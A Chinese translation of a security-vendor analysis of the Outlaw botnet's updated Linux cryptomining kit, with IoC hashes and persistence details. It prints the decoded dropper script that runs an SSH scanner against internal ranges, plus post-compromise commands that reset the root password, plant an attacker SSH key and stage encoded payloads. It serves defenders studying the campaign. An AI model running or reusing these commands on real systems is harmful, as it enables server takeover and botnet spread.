研究人员发现Outlaw黑客组织自7月份后沉默了一段时间现在又开始活动了。12月份的攻击活动中更新了扩展的扫描器参数和目标,通过错误消息的文件的循环执行,针对扫描活动改善了绕过技术,通过杀掉竞争和之前的挖矿机来增加挖矿收入。
研究人员分析了该套件,发现该套件是用来从汽车、金融行业来窃取信息,在被入侵的系统中发起攻击,然后出售被窃的信息。与之前攻击活动相比,研究人员认为Outlaw更新了系统、评估了之前受感染主机的安全性,找到了新的和老的目标,还可能会测试在野的更新。
感染方法
这些新样本会利用已知漏洞来攻击Linux系统、Unix系统、有漏洞的服务器和物联网设备。此次攻击者使用CVE-2016-8655和Dirty COW漏洞利用(CVE-2016-5195)作为攻击向量来攻击未修复这些漏洞的系统。使用简单的基于PHP的web shell的文件用来攻击使用弱SSH和telnet凭证的系统。在攻击活动中,研究人员没有发现有钓鱼或社会工程攻击,但研究人员在未来中发现多个攻击。表明与特定活动相关的活动峰值的蜜罐网络图也表明扫描是分时的。
研究人员将这一举动归属为混淆技术,因为其中混淆了大量可能会被误认为是在线灰噪声的脚本活动。
图 1. 从流量中检测到的命令的异常特征
从分析的样本中,研究人员发现攻击是从一个VPS开始的,该VPS会搜索有漏洞的服务器来入侵。一旦感染,受感染系统的C2命令会发起大量扫描活动,并发送“whole kit”二进制文件来传播僵尸网络。攻击者通过对扫描器代码进行base64编码来尝试绕过流量监测。
解码后的扫描器代码如下:
#!/bin/bash cd /tmp rm -rf .ssh rm -rf .mountfs rm -rf .X13-unix rm -rf .X17-unix rm -rf .X19-unix mkdir .X19-unix cd .X19-unix mv /var/tmp/dota3.tar.gz dota3.tar.gz tar xf dota3.tar.gz sleep 3s && cd /tmp/.X19-unix/.rsync/c nohup /tmp/.X19-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 192.168 >> /dev/null 2>1& sleep 8m && nohup /tmp/.X19-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 172.16 >> /dev/null 2>1& sleep 20m && cd ..; /tmp/.X19-unix/.rsync/initall 2>1& exit 0
研究人员该套件是tgz格式的,同时也有一些样本伪装称png或jpg文件。之前的攻击方法利用了竞争矿工活动和不相关的组件来劫持以获利,而最新版本的代码会尝试移除与之前感染相关的文件和代码,并创建一个新的工作目录/tmp/.X19-unix来移动该套件并提取文件。然后tsm二进制文件会在后台运行,转发一系列的错误消息到/dev/null来保持代码运行,确保/tmp/up.txt中的参数集引用的代码的持续执行。然后脚本会在运行wrapper script initall前等待20分钟:
2e2c9d08c7c955f6ce5e27e70b0ec78a888c276d71a72daa0ef9e3e40f019a1a initall
图 2. 运行initall wrapper脚本
系统被成功入侵后,另一个变种会执行一系列命令。这些命令都与从受感染的机器中收集的信息相关,比如CPU核数、用户、计划任务、运行的进程、安装的操作系统、CPU和内存信息,并修改密码为/tmp/up.txt中保存的随机字符串。在之前的执行中,研究人员发现dota2有自己的文件夹,但是几乎不执行,表明该版本处在更新循环中:
cat /proc/cpuinfo | grep name | wc -l
echo "root:TXhf4ICTayIh"|chpasswd|bash
echo "321" > /var/tmp/.var03522123
rm -rf /var/tmp/.var03522123
cat /var/tmp/.var03522123 | head -n 1
cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
ls -lh $(which ls)
which ls
crontab -l
w
uname -m
cat /proc/cpuinfo | grep model | grep name | wc -l
top
uname
uname -a
lscpu | grep Model
echo "root 123" > /tmp/up.txt
rm -rf /var/tmp/dota*cat /var/tmp/.systemcache436621
echo "1" > /var/tmp/.systemcache436621
cat /var/tmp/.systemcache436621
sleep 15s && cd /var/tmp; echo "IyEvYmluL2Jhc2gKY2QgL3RtcAk.....cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3N.....运行该脚本会移除之前攻击中遗留的文件和脚本,保持被检测到的可能性最低。如果系统之前感染过加密货币挖矿机,就会尝试杀掉运行的挖矿机和相关的活动。
根据最新样本的bashtemp目录,研究人员发现其他编译的ELF脚本,名为init和init2,会在kit中循环来保持运行:
0c458dfe0a2a01ab300c857fdc3373b75fbb8ccfa23d16eff0d6ab888a1a28f6 init
图 3. 运行 init ELF脚本
93ce211a71867017723cd78969aa4cac9d21c3d8f72c96ee3e1b2712c0eea494 init2
图 4. 运行init2 ELF脚本
init 和init2脚本会确保其他运行的挖矿服务都杀掉,并确保工作目录中的所有文件都以777权限执行。
研究人员还发现了一个运行的init0脚本,该脚本会清除源以外的所有挖矿机。
图 5. 运行的init0脚本
恶意软件会重置cron并从其他程序中移除所有的缓存文件,启用脚本和二进制文件——init0,通过修改crontab来开始和设置驻留。该二进制文件是一个要开始运行的脚本封装,一个Perl混淆的脚本来获取受感染系统的控制权。
Shellbot会将自己伪装成一个名为rsync的进程,许多基于Linux和Unix的系统中看到的二进制文件都会执行运行来备份和同步。这就使得恶意活动来绕过检测。
图 6. rsync (Shellbot)的当前变量
图 7. 连接到C2服务器来发送当前控制变量
Shellbot脚本会在受害者系统重启后加入,脚本/a/upd、/b/sync/和/c/aptitude/都会加入到crontab中。但在查看代码时,upd、sync和aptitude都会在最新版本的套件中禁用。目前还不清除这些是之前版本的遗留代码还是新加入的用作特定目的的代码。
Shellbot是用来控制僵尸网络的,有一个命令会来自C2服务器来确定shell中是否有代码执行。所有从受感染系统中收集的结果和系统信息都会在设备中本地保存一段时间,然后发送回C2服务器。
研究人员还发现基于APK和ADB的命令的痕迹,这些命令会启用基于安卓的TV的加密货币挖挖矿活动:
图 8. tv.apk app的安卓manifest XML文件
本文翻译自:https://blog.trendmicro.com/trendlabs-security-intelligence/outlaw-updates-kit-to-kill-older-miner-versions-targets-more-systems/如若转载,请注明原文地址:
如有侵权请联系:admin#unsafe.sh